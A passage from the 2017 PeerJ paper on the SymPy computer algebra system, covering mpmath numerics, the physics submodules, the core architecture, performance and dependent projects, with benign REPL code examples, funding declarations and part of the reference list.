functions use the same naming scheme, although this is not true in every case. For example, the symbolic SymPy summation expression Sum(f(x), (x, a, b)) representing ∑b x=a f (x) is represented in mpmath as nsum(f, (a, b)), where f is a numeric Python function. The mpmath library supports special functions, root-finding, linear algebra, polynomial approximation, and numerical computation of limits, derivatives, integrals, infinite series, and solving ODEs. All features work in arbitrary precision and use algorithms that allow computing hundreds of digits rapidly (except in degenerate cases). The double exponential (tanh-sinh) quadrature is used for numerical integration by default. For smooth integrands, this algorithm usually converges extremely rapidly, even when the integration interval is infinite or singularities are present at the endpoints (Takahasi & Mori, 1974; Bailey, Jeyabalan & Li, 2005). However, for good performance, Meurer et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.103 13/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.103 singularities in the middle of the interval must be specified by the user. To evaluate slowly converging limits and infinite series, mpmath automatically tries Richardson extrapolation and the Shanks transformation (Euler-Maclaurin summation can also be used) (Bender & Orszag, 1999). A function to evaluate oscillatory integrals by means of convergence acceleration is also available. A wide array of higher mathematical functions is implemented with full support for complex values of all parameters and arguments, including complete and incomplete gamma functions, Bessel functions, orthogonal polynomials, elliptic functions and integrals, zeta and polylogarithm functions, the generalized hypergeometric function, and the Meijer G-function. The Meijer G-function instance G3,01,3 ( 0;12,−1,− 3 2 ∣∣x) is a good test case (Toth, 2007); past versions of both Maple and Mathematica produced incorrect numerical values for large x > 0. Here, mpmath automatically removes an internal singularity and compensates for cancellations (amounting to 656 bits of precision when x =10,000), giving correct values: >>> mpmath.mp.dps = 15 >>> mpmath.meijerg([[],[0]], [[-0.5,-1,-1.5],[]], 10000) mpf('2.4392576907199564e-94') Equivalently, with SymPy’s interface this function can be evaluated as: >>> meijerg([[],[0]], [[-S(1)/2,-1,-S(3)/2],[]], 10000).evalf() 2.43925769071996e-94 Symbolic integration and summation often produce hypergeometric and Meijer G- function closed forms (see Section ‘Calculus’); numerical evaluation of such special functions is a useful complement to direct numerical integration and summation. PHYSICS SUBMODULE SymPy includes several submodules that allow users to solve domain specific physics problems. For example, a comprehensive physics submodule is included that is useful for solving problems in mechanics, optics, and quantum mechanics along with support for manipulating physical quantities with units. Classical mechanics One of the core domains that SymPy suports is the physics of classical mechanics. This is in turn separated into two distinct components: vector algebra and mechanics. Vector algebra The sympy.physics.vector submodule provides reference frame-, time-, and space- aware vector and dyadic objects that allow for three-dimensional operations such as addition, subtraction, scalar multiplication, inner and outer products, and cross products. The vector and dyadic objects both can be written in very compact notation that make it easy to express the vectors and dyadics in terms of multiple reference frames with arbitrarily defined relative orientations. The vectors are used to specify the positions, velocities, and accelerations of points; orientations, angular velocities, and angular accelerations of Meurer et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.103 14/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.103 reference frames; and forces and torques. The dyadics are essentially reference frame-aware 3 × 3 tensors (Tai, 1997). The vector and dyadic objects can be used for any one-, two-, or three-dimensional vector algebra, and they provide a strong framework for building physics and engineering tools. The following Python code demonstrates how a vector is created using the orthogonal unit vectors of three reference frames that are oriented with respect to each other, and the result of expressing the vector in the A frame. The B frame is oriented with respect to the A frame using Z-X-Z Euler Angles of magnitude π, π2 , and π 3 , respectively, whereas the C frame is oriented with respect to the B frame through a simple rotation about the B frame’s X unit vector through π2 . >>> from sympy.physics.vector import ReferenceFrame >>> A, B, C = symbols('A B C', cls=ReferenceFrame) >>> B.orient(A, 'body', (pi, pi/3, pi/4), 'zxz') >>> C.orient(B, 'axis', (pi/2, B.x)) >>> v = 1*A.x + 2*B.z + 3*C.y >>> v A.x + 2*B.z + 3*C.y >>> v.express(A) A.x + 5*sqrt(3)/2*A.y + 5/2*A.z Mechanics The sympy.physics.mechanics submodule utilizes the sympy.physics.vector submodule to populate time-aware particle and rigid-body objects to fully describe the kinematics and kinetics of a rigid multi-body system. These objects store all of the information needed to derive the ordinary differential or differential algebraic equations that govern the motion of the system, i.e., the equations of motion. These equations of motion abide by Newton’s laws of motion and can handle arbitrary kinematic constraints or complex loads. The submodule offers two automated methods for formulating the equations of motion based on Lagrangian Dynamics (Lagrange, 1811) and Kane’s Method (Kane & Levinson, 1985). Lastly, there are automated linearization routines for constrained dynamical systems (Peterson, Gede & Hubbard, 2014). Quantum mechanics The sympy.physics.quantum submodule has extensive capabilities to solve problems in quantum mechanics, using Python objects to represent the different mathematical objects relevant in quantum theory (Sakurai & Napolitano, 2010): states (bras and kets), operators (unitary, Hermitian, etc.), and basis sets, as well as operations on these objects such as representations, tensor products, inner products, outer products, commutators, and anticommutators. The base objects are designed in the most general way possible to enable any particular quantum system to be implemented by subclassing the base operators and defining the relevant class methods to provide system-specific logic. Symbolic quantum operators and states may be defined, and one can perform a full range of operations with them. Meurer et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.103 15/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.103 >>> from sympy.physics.quantum import Commutator, Dagger, Operator >>> from sympy.physics.quantum import Ket, qapply >>> A, B, C, D = symbols('A B C D', cls=Operator) >>> a = Ket('a') >>> comm = Commutator(A, B) >>> comm [A,B] >>> qapply(Dagger(comm*a)).doit() -<a|*(Dagger(A)*Dagger(B) - Dagger(B)*Dagger(A)) Commutators can be expanded using common commutator identities: >>> Commutator(C+B, A*D).expand(commutator=True) -[A,B]*D - [A,C]*D + A*[B,D] + A*[C,D] On top of this set of base objects, a number of specific quantum systems have been implemented in a fully symbolic framework. These include: • Many of the exactly solvable quantum systems, including simple harmonic oscillator states and raising/lowering operators, infinite square well states, and 3D position and momentum operators and states. • Second quantized formalism of non-relativistic many-body quantum mechanics (Fetter & Walecka, 2003). • Quantum angular momentum (Zare, 1991). Spin operators and their eigenstates can be represented in any basis and for any quantum numbers. A rotation operator representing the Wigner D-matrix, which may be defined symbolically or numerically, is also implemented to rotate spin eigenstates. Functionality for coupling and uncoupling of arbitrary spin eigenstates is provided, including symbolic representations of Clebsch- Gordon coefficients and Wigner symbols. • Quantum information and computing (Nielsen & Chuang, 2011). Multidimensional qubit states, and a full set of one- and two-qubit gates are provided and can be represented symbolically or as matrices/vectors. With these building blocks, it is possible to implement a number of basic quantum algorithms including the quantum Fourier transform, quantum error correction, quantum teleportation, Grover’s algorithm, dense coding, etc. In addition, any quantum circuit may be plotted using the circuit_plot function (Fig. 1). Here are a few short examples of the quantum information and computing capabilities in sympy.physics.quantum . Start with a simple four-qubit state and flip the second qubit from the right using a Pauli-X gate: >>> from sympy.physics.quantum.qubit import Qubit >>> from sympy.physics.quantum.gate import XGate >>> q = Qubit('0101') >>> q |0101> >>> X = XGate(1) Meurer et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.103 16/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.103 H S T H S H Figure 1 The circuit diagram for a three-qubit quantum Fourier transform generated by SymPy. >>> qapply(X*q) |0111> Qubit states can also be used in adjoint operations, tensor products, inner/outer products: >>> Dagger(q) <0101| >>> ip = Dagger(q)*q >>> ip <0101|0101> >>> ip.doit() 1 Quantum gates (unitary operators) can be applied to transform these states and then classical measurements can be performed on the results: >>> from sympy.physics.quantum.qubit import measure_all >>> from sympy.physics.quantum.gate import H, X, Y, Z >>> c = H(0)*H(1)*Qubit('00') >>> c H(0)*H(1)*|00> >>> q = qapply(c) >>> measure_all(q) [(|00>, 1/4), (|01>, 1/4), (|10>, 1/4), (|11>, 1/4)] Lastly, the following example demonstrates creating a three-qubit quantum Fourier transform, decomposing it into one- and two-qubit gates, and then generating a circuit plot for the sequence of gates (see Fig. 1). >>> from sympy.physics.quantum.qft import QFT >>> from sympy.physics.quantum.circuitplot import circuit_plot >>> fourier = QFT(0,3).decompose() >>> fourier SWAP(0,2)*H(0)*C((0),S(1))*H(1)*C((0),T(2))*C((1),S(2))*H(2) >>> c = circuit_plot(fourier, nqubits=3) Meurer et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.103 17/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.103 12Some internal classes, such as those used in the polynomial submodule, do not follow this rule for efficiency reasons. ARCHITECTURE Software architecture is of central importance in any large software project because it establishes predictable patterns of usage and development (Shaw & Garlan, 1996). This section describes the essential structural components of SymPy, provides justifications for the design decisions that have been made, and gives example user-facing code as appropriate. The core A computer algebra system stores mathematical expressions as data structures. For example, the mathematical expression x+y is represented as a tree with three nodes, +, x, and y, where x and y are ordered children of +. As users manipulate mathematical expressions with traditional mathematical syntax, the CAS manipulates the underlying data structures. Symbolic computations such as integration, simplification, etc. are all functions that consume and produce expression trees. In SymPy every symbolic expression is an instance of the class Basic,12 the superclass of all SymPy types providing common methods to all SymPy tree-elements, such as traversals. The children of a node in the tree are held in the args attribute. A leaf node in the expression tree has empty args. For example, consider the expression xy+2: >>> x, y = symbols('x y') >>> expr = x*y + 2 By order of operations, the parent of the expression tree for expr is an addition. It is of type Add. The child nodes of expr are 2 and x*y. >>> type(expr) <class 'sympy.core.add.Add'> >>> expr.args (2, x*y) Descending further down into the expression tree yields the full expression. For example, the next child node (given by expr.args[0]) is 2. Its class is Integer, and it has an empty args tuple, indicating that it is a leaf node. >>> expr.args[0] 2 >>> type(expr.args[0]) <class 'sympy.core.numbers.Integer'> >>> expr.args[0].args () Symbols or symbolic constants, like e or π, are other examples of leaf nodes. >>> exp(1) E >>> exp(1).args Meurer et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.103 18/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.103 13The dotprint function from the sympy.printing.dot submodule prints output to dot format, which can be rendered with Graphviz to visualize expression trees graphically. 14expr.func is used instead of type(expr) to allow the function of an expression to be distinct from its actual Python class. In most cases the two are the same. () >>> x.args () A useful way to view an expression tree is using the srepr function, which returns a string representation of an expression as valid Python code13 with all the nested class constructor calls to create the given expression. >>> srepr(expr) "Add(Mul(Symbol('x'), Symbol('y')), Integer(2))" Every SymPy expression satisfies a key identity invariant: expr.func(*expr.args) == expr This means that expressions are rebuildable from their args.14 Note that in SymPy the == operator represents exact structural equality, not mathematical equality. This allows testing if any two expressions are equal to one another as expression trees. For example, even though (x+1)2 and x2+2x+1 are equal mathematically, SymPy gives >>> (x + 1)**2 == x**2 + 2*x + 1 False because they are different as expression trees (the former is a Pow object and the latter is an Add object). Another important property of SymPy expressions is that they are immutable. This simplifies the design of SymPy, and enables expression interning. It also enables expressions to be hashed, which allows expressions to be used as keys in Python dictionaries, and is used to implement caching in SymPy. Python allows classes to override mathematical operators. The Python interpreter translates the above x*y + 2 to, roughly, (x.__mul__(y)).__add__(2) . Both x and y, returned from the symbols function, are Symbol instances. The 2 in the expression is processed by Python as a literal, and is stored as Python’s built in int type. When 2 is passed to the __add__ method of Symbol, it is converted to the SymPy type Integer(2) before being stored in the resulting expression tree. In this way, SymPy expressions can be built in the natural way using Python operators and numeric literals. Extensibility While the core of SymPy is relatively small, it has been extended to a wide variety of domains by a broad range of contributors. This is due, in part, to the fact that the same language, Python, is used both for the internal implementation and the external usage by users. All of the extensibility capabilities available to users are also utilized by SymPy itself. This eases the transition pathway from SymPy user to SymPy developer. The typical way to create a custom SymPy object is to subclass an existing SymPy class, usually Basic, Expr, or Function. As it was stated before, all SymPy classes used for expression trees should be subclasses of the base class Basic. Expr is the Basic subclass for mathematical objects that can be added and multiplied together. The most commonly seen classes in SymPy are subclasses of Expr, including Add, Mul, and Symbol. Instances of Meurer et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.103 19/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.103 15See Section S3 for more information on the sympy.logic submodule. Expr typically represent complex numbers, but may also include other ‘‘rings’’, like matrix expressions. Not all SymPy classes are subclasses of Expr. For instance, logic expressions, such as And(x, y) , are subclasses of Basic but not of Expr.15 The Function class is a subclass of Expr which makes it easier to define mathematical functions called with arguments. This includes named functions like sin(x) and log(x) as well as undefined functions like f (x). Subclasses of Function should define a class method eval, which returns an evaluated value for the function application (usually an instance of some other class, e.g., a Number), or None if for the given arguments it should not be automatically evaluated. Many SymPy functions perform various evaluations down the expression tree. Classes define their behavior in such functions by defining a relevant _eval_ * method. For instance, an object can indicate to the diff function how to take the derivative of itself by defining the _eval_derivative(self, x) method, which may in turn call diff on its args. (Subclasses of Function should implement the fdiff method instead; it returns the derivative of the function without considering the chain rule.) The most common _eval_ * methods relate to the assumptions: _eval_is_ assumption is used to deduce assumption on the object. Listing 1 presents an example of this extensibility. It gives a stripped down version of the gamma function 0(x) from SymPy. The methods defined allow it to evaluate itself on positive integer arguments, define the real assumption, allow it to be rewritten in terms of factorial (with gamma(x).rewrite(factorial) ), and allow it to be differentiated. self.func is used throughout instead of referencing gamma explicitly so that potential subclasses of gamma can reuse the methods. Listing 1: A minimal implementation of sympy.gamma. from sympy import Function , Integer , factorial , polygamma class gamma(Function ): @classmethod def eval(cls , arg): if isinstance(arg , Integer) and arg.is_positive: return factorial(arg - 1) def _eval_is_real(self): x = self.args [0] # noninteger means real and not integer if x.is_positive or x.is_noninteger: return True def _eval_rewrite_as_factorial(self , z): return factorial(z - 1) def fdiff(self , argindex =1): from sympy.core.function import ArgumentIndexError if argindex == 1: return self.func(self.args [0])* polygamma(0, self.args [0]) else: raise ArgumentIndexError(self , argindex) The gamma function implemented in SymPy has many more capabilities than the above listing, such as evaluation at rational points and series expansion. Meurer et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.103 20/27 http://dx.doi.org/10.7717/peerj-cs.103/supp-1 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.103 Performance Due to being written in pure Python without the use of extension modules, SymPy’s performance characteristics are generally poorer than that of its commercial competitors. For many applications, the performance of SymPy, as measured by clock cycles, memory usage, and memory layout, is sufficient. However, the boundaries for when SymPy’s pure Python strategy becomes insufficient are when the user requires handling of very long expressions or many small expressions. Where this boundray lies depends on the system at hand, but tends to be within the range of 104–106 symbols for modern computers. For this reason, a new project called SymEngine (The SymPy Developers, 2016a) has been started. The aim of this poject is to develop a library with better performance characteristics for symbolic manipulation. SymEngine is a pure C++ library, which allows it fine-grained control over the memory layout of expressions. SymEngine has thin wrappers to other languages (Python, Ruby, Julia, etc.). Its aim is to be the fastest symbolic manipulation library. Preliminary benchmarks suggest that SymEngine performs as well as its commercial and open source competitors. The development version of SymPy has recently started to use SymEngine as an optional backend, initially in sympy.physics.mechanics only. Future work will involve allowing more algorithms in SymPy to use SymEngine as a backend. PROJECTS THAT DEPEND ON SYMPY There are several projects that depend on SymPy as a library for implementing a part of their functionality. A selection of these projects are listed in Table 3. CONCLUSION AND FUTURE WORK SymPy is a robust computer algebra system that provides a wide spectrum of features both in traditional computer algebra and in a plethora of scientific disciplines. It can be used in a first-class way with other Python projects, including the scientific Python stack. SymPy supports a wide array of mathematical facilities. These include functions for assuming and deducing common mathematical facts, simplifying expressions, performing common calculus operations, manipulating polynomials, pretty printing expressions, solving equations, and representing symbolic matrices. Other supported facilities include discrete math, concrete math, plotting, geometry, statistics, sets, series, vectors, combinatorics, group theory, code generation, tensors, Lie algebras, cryptography, and special functions. SymPy has strong support for arbitrary precision numerics, backed by the mpmath package. Additionally, SymPy contains submodules targeting certain specific physics domains, such as classical mechanics and quantum mechanics. This breadth of domains has been engendered by a strong and vibrant user community. Anecdotally, many of these users chose SymPy because of its ease of access. SymPy is a dependency of many external projects across a wide spectrum of domains. SymPy expressions are immutable trees of Python objects. Unlike many other CAS’s, SymPy is designed to be used in an extensible way: both as an end-user application and as a library. SymPy uses Python both as the internal language and the user language. This Meurer et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.103 21/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.103 Table 3 Selected projects that depend on SymPy. Project name Description SymPy Gamma An open source analog of Wolfram |Alpha that uses SymPy (The SymPy Developers, 2016b). There is more information about SymPy Gamma in Section S11. Cadabra A CAS designed specifically for the resolution of problems encountered in field theory (Peeters, 2007). GNU Octave Symbolic Package An implementation of a symbolic toolbox for Octave using SymPy (The Symbolic Package Developers, 2016). SymPy.jl A Julia interface to SymPy, provided using PyCall (The SymPy.jl Developers, 2016). Mathics A free, online CAS featuring Mathematica compatible syntax and functions (The Mathics Developers, 2016). Mathpix An iOS App that detects handwritten math as input and uses SymPy Gamma to evaluate the math input and generate the relevant steps to solve the problem (Mathpix, Inc., 2016). IKFast A robot kinematics compiler provided by OpenRAVE (Diankov, 2010). SageMath A free open-source mathematics software system, which builds on top of many existing open-source packages, including SymPy (The Sage Developers, 2016). PyDy Multibody Dynamics with Python (Gede et al., 2013). galgebra A Python package for geometric algebra (previously sympy.galgebra) (Bromborsky, 2016). yt A Python package for analyzing and visualizing volumetric data (Turk et al., 2011). SfePy A Python package for solving partial differential equations (PDEs) in 1D, 2D, and 3D by the finite element (FE) method (Zienkiewicz, Taylor & Zhu, 2013; Cimrman, 2014). Quameon Quantum Monte Carlo in Python (The Quameon Developers, 2016). Lcapy An experimental Python package for teaching linear circuit analysis (The Lcapy Developers, 2016). permits users to access the same methods used by the library itself in order to extend it for their needs. Some of the planned future work for SymPy includes work on improving code generation, improvements to the speed of SymPy using SymEngine, improving the assumptions system, and improving the solvers submodule. ADDITIONAL INFORMATION AND DECLARATIONS Funding Google Summer of Code provided financial support to students who contributed to SymPy. Ondřej Čertík was supported by the Los Alamos National Laboratory. The Los Alamos National Laboratory is operated by Los Alamos National Security, LLC, for the National Nuclear Security Administration of the US Department of Energy under Contract No. Meurer et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.103 22/27 https://peerj.com http://sympygamma.com/ http://dx.doi.org/10.7717/peerj-cs.103/supp-1 http://cadabra.science/index.html https://github.com/cbm755/octsympy https://github.com/jverzani/SymPy.jl https://mathics.github.io/ http://mathpix.com/ http://openrave.org/docs/latest_stable/openravepy/ikfast/ http://openrave.org/ http://www.sagemath.org/ http://www.pydy.org/ https://github.com/brombo/galgebra http://yt-project.org/ http://sfepy.org/ http://quameon.sourceforge.net/ http://lcapy.elec.canterbury.ac.nz/ http://dx.doi.org/10.7717/peerj-cs.103 DE-AC52-06NA25396. Richard P. Muller was supported by Sandia National Laboratories. Sandia National Laboratories is a multi-program laboratory managed and operated by Sandia Corporation, a wholly owned subsidiary of Lockheed Martin Corporation, for the U.S. Department of Energy’s National Nuclear Security Administration under contract DE- AC04-94AL85000. Francesco Bonazzi was supported by Deutsche Forschungsgemeinschaft (DFG) via the International Research Training Group 1524 ‘‘Self- Assembled Soft Matter Nano-Structures at Interfaces.’’ The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Google Summer of Code. Los Alamos National Laboratory: No. DE-AC52-06NA25396. Sandia National Laboratories: DE-AC04-94AL85000. International Research Training Group 1524. Competing Interests Christopher P. Smith is an employee of Polar Semiconductor, Inc., Bloomington, Minnesota, United States; Mateusz Paprocki and Matthew Rocklin are employees of Continuum Analytics, Inc., Austin, Texas, United States; Andy R. Terrel is an employee of Fashion Metric, Inc, Austin, Texas, United States. Author Contributions • Aaron Meurer, Christopher P. Smith, Mateusz Paprocki, Ondřej Čertík, Sergey B. Kirpichev, Matthew Rocklin, AMiT Kumar, Sergiu Ivanov, Jason K. Moore, Sartaj Singh, Thilina Rathnayake, Sean Vig, Brian E. Granger, Richard P. Muller, Francesco Bonazzi, Harsh Gupta, Shivam Vats, Fredrik Johansson, Fabian Pedregosa, Matthew J. Curry, Andy R. Terrel, Štěpán Roučka, Ashutosh Saboo, Isuru Fernando, Sumith Kulal, Robert Cimrman and Anthony Scopatz wrote the paper, performed the computation work, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: The source for the paper is at https://github.com/sympy/sympy-paper. The source code for SymPy is at https://github.com/sympy/sympy. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.103#supplemental-information. REFERENCES Adams WW, Loustaunau P. 1994. An introduction to Gröbner bases. Vol. 3. Boston: American Mathematical Society. Meurer et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.103 23/27 https://peerj.com https://github.com/sympy/sympy-paper https://github.com/sympy/sympy http://dx.doi.org/10.7717/peerj-cs.103#supplemental-information http://dx.doi.org/10.7717/peerj-cs.103#supplemental-information http://dx.doi.org/10.7717/peerj-cs.103 Bailey DH, Jeyabalan K, Li XS. 2005. A comparison of three high-precision quadrature schemes. Experimental Mathematics 14(3):317–329. Bender CM, Orszag SA. 1999. Advanced mathematical methods for scientists and engineers. 1st edition. Berlin Heidelberg: Springer. Biggs N, Lloyd EK, Wilson RJ. 1976. Graph theory, 1736–1936. Oxford: Oxford University Press. Bromborsky A. 2016. Geometric algebra/calculus modules for SymPy galgebra. Available at https://github.com/brombo/galgebra. Bronstein M. 2005a. pmint—The Poor Man’s Integrator. Available at http://www- sop.inria.fr/cafe/Manuel.Bronstein/pmint. Bronstein M. 2005b. Symbolic integration I: transcendental functions. New York: Springer–Verlag. Buchberger B. 1965. Ein Algorithmus zum Auffinden der Basis Elemente des Restk- lassenrings nach einem nulldimensionalen Polynomideal. PhD thesis, University of Innsbruck, Innsbruck, Austria. Cervone D. 2012. MathJax: a platform for mathematics on the Web. Notices of the AMS 59(2):312–316. Cimrman R. 2014. SfePy—write your own FE application. Proceedings of the 6th european conference on Python in science (EuroSciPy 2013). 65–70. Available at http://arxiv.org/abs/1404.6391. Ciurana E. 2009. Google app engine. In: Developing with Google App Engine. FirstPress (En ligne), Berkeley: Apress. Diankov R. 2010. Ikfast: the robot kinematics compiler. Available at http://openrave.org/ docs/latest_stable/openravepy/ikfast/ . Doorenbos RB. 1995. Production matching for large learning systems. PhD thesis, University of Southern California. Faugère JC. 1999. A new efficient algorithm for computing Gröbner bases (F4). Journal of Pure and Applied Algebra 139(1–3):61–88. Faugère JC. 2002. A new efficient algorithm for computing Gröbner bases without reduction to zero (F5). In: ISSAC’02: proceedings of the 2002 international symposium on symbolic and algebraic computation. New York: ACM Press 75–83.. Fetter A, Walecka J. 2003. Quantum theory of many-particle systems. Mineola: Dover Publications. Fousse L, Hanrot G, Lefèvre V, Pélissier P, Zimmermann P. 2007. MPFR: a multiple- precision binary floating-point library with correct rounding. ACM Transactions on Mathematical Software 33(2): DOI 10.1145/1236463.1236468. Fu H, Zhong X, Zeng Z. 2006. Automated and readable simplification of trigonomet- ric expressions. Mathematical and Computer Modelling 55(11–12):1169–1177 DOI 10.1016/j.mcm.2006.04.002. Gede G, Peterson DL, Nanjangud AS, Moore JK, Hubbard M. 2013. Constrained multi- body dynamics with Python: from symbolic equation generation to publication. In: ASME 2013 international design engineering technical conferences and computers and Meurer et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.103 24/27 https://peerj.com https://github.com/brombo/galgebra http://www-sop.inria.fr/cafe/Manuel.Bronstein/pmint http://www-sop.inria.fr/cafe/Manuel.Bronstein/pmint http://arxiv.org/abs/1404.6391 http://openrave.org/docs/latest_stable/openravepy/ikfast/ http://openrave.org/docs/latest_stable/openravepy/ikfast/ http://dx.doi.org/10.1145/1236463.1236468 http://dx.doi.org/10.1016/j.mcm.2006.04.002 http://dx.doi.org/10.7717/peerj-cs.103 information in engineering conference, New York: American Society of Mechanical Engineers, V07BT10A051–V07BT10A051. Goldberg D. 1991. What every computer scientist should know about floating-point arithmetic. ACM Computing Surveys (CSUR) 23(1):5–48. Gosper RW. 1978. Decision procedure for indefinite hypergeometric summation. Proceedings of the National Academy of Sciences of the United States of America 75(1):40–42. Gruntz D. 1996. On computing limits in a symbolic manipulation system. PhD thesis, Swiss Federal Institute of Technology, Zürich, Switzerland. Horsen CV. 2015. GMPY. Available at https://pypi.python.org/pypi/gmpy2. Hudak P. 1998. Domain specific languages. In: Salas PH, ed. Handbook of programming languages, vol. III: little languages and tools, chapter 3. Indianapolis: MacMillan, 39–60. Hunter JD. 2007. Matplotlib: a 2D graphics environment. Computing in Science & Engineering 9(3):90–95. Johansson F, The mpmath Development Team. 2014. mpmath: a Python library for arbitrary-precision floating-point arithmetic. Version 0.19. Available at http: //mpmath.org/ . Jones E, Oliphant T, Peterson P, The SciPy Development Team. 2001. SciPy: open source scientific tools for Python. Available at http://www.scipy.org/ (accessed on 28 September 2016). Kane TR, Levinson DA. 1985. Dynamics, theory and applications. New York: McGraw Hill. Kluyver T, Ragan-Kelley B, Pérez F, Granger B, Bussonnier M, Frederic J, Kelley K, Hamrick J, Grout J, Corlay S, Ivanov P, Avila D, Abdalla S, Willing C, The Jupyter Development Team. 2016. Jupyter Notebooks—a publishing format for reproducible computational workflows. In: Positioning and power in academic publishing: players, agents and agendas: proceedings of the 20th international conference on electronic publishing. Amsterdam: IOS Press, 87. Lagrange J. 1811. Mécanique analytique. No. v.1. Paris: Ve Courcier. Lang S. 1966. Introduction to transcendental numbers. In: Addison-Wesley series in mathematics. Reading: Addison-Wesley Pub. Co. Lutz M. 2013. Learning Python. Sebastopol: O’Reilly Media, Inc. Mathpix, Inc. 2016. Mathpix — Solve and graph math using pictures. Available at http://mathpix.com/ . Moses J. 1971. Algebraic simplification: a guide for the Perplexed. In: SYMSAC’71: proceedings of the second ACM symposium on symbolic and algebraic computation. New York: ACM Press, 282–304 DOI 10.1145/800204.806298. Nielsen M, Chuang I. 2011. Quantum computation and quantum information. New York: Cambridge University Press. Nijenhuis A, Wilf HS. 1978. Combinatorial algorithms: for computers and calculators. second edition. New York: Academic Press. Meurer et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.103 25/27 https://peerj.com https://pypi.python.org/pypi/gmpy2 http://mpmath.org/ http://mpmath.org/ http://www.scipy.org/ http://mathpix.com/ http://dx.doi.org/10.1145/800204.806298 http://dx.doi.org/10.7717/peerj-cs.103 Oliphant TE. 2007. Python for scientific computing. Computing in Science & Engineering 9(3):10–20. Paprocki M. 2010. Design and implementation issues of a computer algebra system in an interpreted, dynamically typed programming language. Master’s thesis, University of Technology of Wrocław, Poland. Peeters K. 2007. Cadabra: a field-theory motivated symbolic computer algebra system. Computer Physics Communications 176(8):550–558. Pérez F, Granger BE. 2007. IPython: a system for interactive scientific computing. Computing in Science & Engineering 9(3):21–29. Peterson DL, Gede G, Hubbard M. 2014. Symbolic linearization of equations of motion of constrained multibody systems. Multibody System Dynamics 33(2):143–161 DOI 10.1007/s11044-014-9436-5. Petkovšek M, Wilf HS, Zeilberger D. 1997. A = B. Wellesley: AK Peters, Ltd., 222+.Available at http://www.math.rutgers.edu/~zeilberg/AeqB.pdf . Raymond E. 1999. The cathedral and the bazaar. Knowledge, Technology & Policy 12(3):23–49. Roach K. 1996. Hypergeometric function representations. In: ISSAC’96: proceedings of the 1996 international symposium on symbolic and algebraic computation. New York: ACM Press 301–308.. Roach K. 1997. In: ISSAC’97: proceedings of the 1997 international symposium on symbolic and algebraic computation. New York: ACM, 205–211 DOI 10.1145/258726.2587840-89791-875-4. Rocklin M. 2013. Mathematically informed linear algebra codes through term rewriting. PhD thesis, University of Chicago. Rocklin M, Terrel AR. 2012. Symbolic Statistics with SymPy. Computing in Science and Engineering 14(3):88–93 DOI 10.1109/MCSE.2012.56. Rose KH. 1999. XY-pic user’s guide. Available at http://ctan.org/tex-archive/macros/ generic/diagrams/xypic/doc/xyguide.pdf . Rosen L. 2005. Open source licensing: software freedom and intellectual property law. Upper Saddle River: Prentice Hall. Sakurai J, Napolitano J. 2010. Modern quantum mechanics. Boston: Addison-Wesley. Shaw M, Garlan D. 1996. Software architecture: perspectives on an emerging discipline. Pittsburgh: Prentice Hall. Sussman GJ, Wisdom J. 2013. Functional differential geometry. Cambridge: Mas- sachusetts Institute of Technology Press. Tai C-T. 1997. Generalized vector and dyadic analysis: applied mathematics in field theory. Vol. 9. Hoboken: Wiley-IEEE Press. Takahasi H, Mori M. 1974. Double exponential formulas for numerical integration. Publications of the Research Institute for Mathematical Sciences 9(3):721–741. The Lcapy Developers. 2016. Lcapy, a Python package for linear circuit analysis. Available at http://lcapy.elec.canterbury.ac.nz/ . Meurer et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.103 26/27 https://peerj.com http://dx.doi.org/10.1007/s11044-014-9436-5 http://www.math.rutgers.edu/~zeilberg/AeqB.pdf http://dx.doi.org/10.1145/258726.2587840-89791-875-4 http://dx.doi.org/10.1109/MCSE.2012.56 http://ctan.org/tex-archive/macros/generic/diagrams/xypic/doc/xyguide.pdf http://ctan.org/tex-archive/macros/generic/diagrams/xypic/doc/xyguide.pdf http://lcapy.elec.canterbury.ac.nz/ http://dx.doi.org/10.7717/peerj-cs.103 The Mathics Developers. 2016. Mathics, a free, general-purpose online computer algebra system featuring Mathematica-compatible syntax and functions. Available at https://mathics.github.io/ . The Quameon Developers. 2016. Quameon, quantum Monte Carlo in Python. Available at http://quameon.sourceforge.net/ . The Sage Developers. 2016. SageMath, the sage mathematics software system. Available at http://www.sagemath.org. The Symbolic Package Developers. 2016. The symbolic package for GNU Octave. Available at http://octave.sourceforge.net/symbolic. The SymPy Developers. 2016a. SymEngine, a fast symbolic manipulation library, written in C++. Available at https://github.com/symengine/symengine. The SymPy Developers. 2016b. SymPy Gamma. Available at http://www.sympygamma. com/ . The SymPy.jl Developers. 2016. SymPy.jl, a package to bring Python’s SymPy function- ality into Julia via PyCall. Available at https://github.com/JuliaPy/SymPy.jl. Toth VT. 2007. Maple and Meijer’s G-function: a numerical instability and a cure. Available at http://www.vttoth.com/CMS/index.php/technical-notes/67. Turk MJ, Smith BD, Oishi JS, Skory S, Skillman SW, Abel T, Norman ML. 2011. yt: a multi-code analysis toolkit for astrophysical simulation data. The Astrophysical Journal Supplement Series 192:9 DOI 10.1088/0067-0049/192/1/9. Zare R. 1991. Angular momentum: understanding spatial 